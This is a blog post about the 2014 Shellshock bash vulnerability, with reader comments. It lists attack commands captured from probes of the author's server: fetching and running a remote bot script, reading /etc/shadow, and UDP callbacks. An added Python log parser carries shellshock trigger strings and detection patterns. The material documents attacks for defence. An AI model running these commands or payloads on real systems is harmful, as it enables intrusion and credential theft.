In April 2014, the Internet shivered when we faced the “heartbleed” bug in the OpenSSL library. It made a lot of noise across the security community and was even covered by mainstream media. Such an issue could never happen again, right?
Never say never! Last week, a new storm hit the Internet with “shellshock”, better known as CVE-2014-6271! This new bug affects the bash UNIX shell. The difference with heartbleed? When you compare them, heartbleed definitively loses its pole position among the top threats. Shellshock is very easy to exploit, and it affects MANY applications or services that spawn other processes using calls like system() in PHP or the well-known mod_cgi provided by Apache. Not only public websites can be affected, but also some critical services like:
- the ForceCommand feature in sshd
- scripts executed by unspecified DHCP clients,
- network access control services
- …
In short: any service that spawns bash with an environment built from external input. If you need more info about this new threat, google for it!
Some security researchers and bloggers immediately started to scan the Internet to get a better idea of the impact of this vulnerability on public services. Of course, bad guys also started to do the same, and my server was hit several times (94). So far, I have detected the following source IP addresses:
Here is the list of commands/scripts the probes tried to execute:
- /bin/ping -c 1 198.101.206.138
- /bin/bash -c "echo testing9123123"; /bin/uname -a
- /sbin/ifconfig
- /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
- echo -e "Content-Type: text/plain\\n"; echo qQQQQQq
- /bin/cat /etc/shadow
- echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444
- /bin/bash -c "/usr/bin/wget http://singlesaints.com/firefile/temp?h=rootshell.be -O /tmp/a.pl"
- /bin/bash -c "wget -q -O /dev/null http://ad.dipad.biz/test/http://leakedin.com/"
- /bin/bash -c "wget -U BashNslash.http://www.leakedin.com/tag/urls-list/page/97/ 89.248.172.139"
- wget 'http://taxiairportpop.com/s.php?s=http://brucon.org/'
Personally, I like the one which tries to use the built-in socket support of bash via pseudo files like “/dev/[tcp|udp]/<host>/<port>“. This is a nice feature of bash, but it is disabled on most distributions (precisely for security reasons).
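As an added example (not code from the original post), here is a small Python parser that picks the shellshock trigger out of Apache combined-format log lines like the ones that recorded the probes above, tells which CGI-exported field carried it, and classifies the trailing command into the categories seen in the list. The log lines, IPs and paths are constructed for the example, not the author's data.

```python
import re
from typing import Dict, List
# Constructed Apache "combined" log lines (documentation-range IPs, hypothetical paths),
# modelled on the probe commands listed above; not real log data from the post.
SAMPLE_LOG = r'''
192.0.2.10 - - [25/Sep/2014:07:05:09 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :;}; /bin/ping -c 1 198.51.100.7"
192.0.2.11 - - [25/Sep/2014:07:06:41 +0200] "GET / HTTP/1.1" 200 512 "() { :;}; /bin/cat /etc/shadow" "Mozilla/5.0"
192.0.2.12 - - [25/Sep/2014:07:08:03 +0200] "GET /cgi-bin/status HTTP/1.1" 404 12 "-" "() { :;}; echo shellshock-scan > /dev/udp/203.0.113.5/4444"
192.0.2.13 - - [25/Sep/2014:07:09:22 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

# Apache combined format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# CVE-2014-6271 trigger: a value starting with a function definition "() { ... }" followed
# by trailing commands, which vulnerable bash runs while importing the environment.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<payload>.+)$')

# Rough intent of the trailing command, following the categories seen in the probes above.
KIND_PATTERNS = [
    ("callback-socket", re.compile(r'/dev/(tcp|udp)/')),
    ("ping-back", re.compile(r'\bping\b')),
    ("download", re.compile(r'\b(wget|curl)\b')),
    ("file-read", re.compile(r'/etc/(passwd|shadow)')),
]

def classify(payload: str) -> str:
    for kind, pattern in KIND_PATTERNS:
        if pattern.search(payload):
            return kind
    return "other"

def find_shellshock_probes(log_text: str) -> List[Dict[str, str]]:
    """One record per request that carries a shellshock trigger in any CGI-exported field."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # mod_cgi exports the request line, Referer and User-Agent as environment variables
        for field in ("request", "referer", "agent"):
            s = SHELLSHOCK_RE.search(m.group(field))
            if s:
                payload = s.group("payload").strip()
                hits.append({"ip": m.group("ip"), "time": m.group("time"), "field": field,
                             "payload": payload, "kind": classify(payload)})
    return hits
```

Point it at a real access log (or a tail of it) to get the per-source list of probes and what each one tried to do; a hit in the request line or Referer is just as dangerous as one in the User-Agent.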
@Rafael, the moment the news got out, people started to write scans. Most of the scans are just to see how many devices are vulnerable; in most cases they only do a ping back to the scanner. Other scans try to copy your passwd or other interesting files. And then there are also the scanners which download (e.g. with wget) a malicious shell and run it.
First hit: 25/Sep/2014:07:05:09 +0200
And the counter is growing: 179 probes 🙂
Since when did the scans start?
I almost fell off my chair seeing the last one (BruCON). You might want to check brucon.org if you want to know more about it.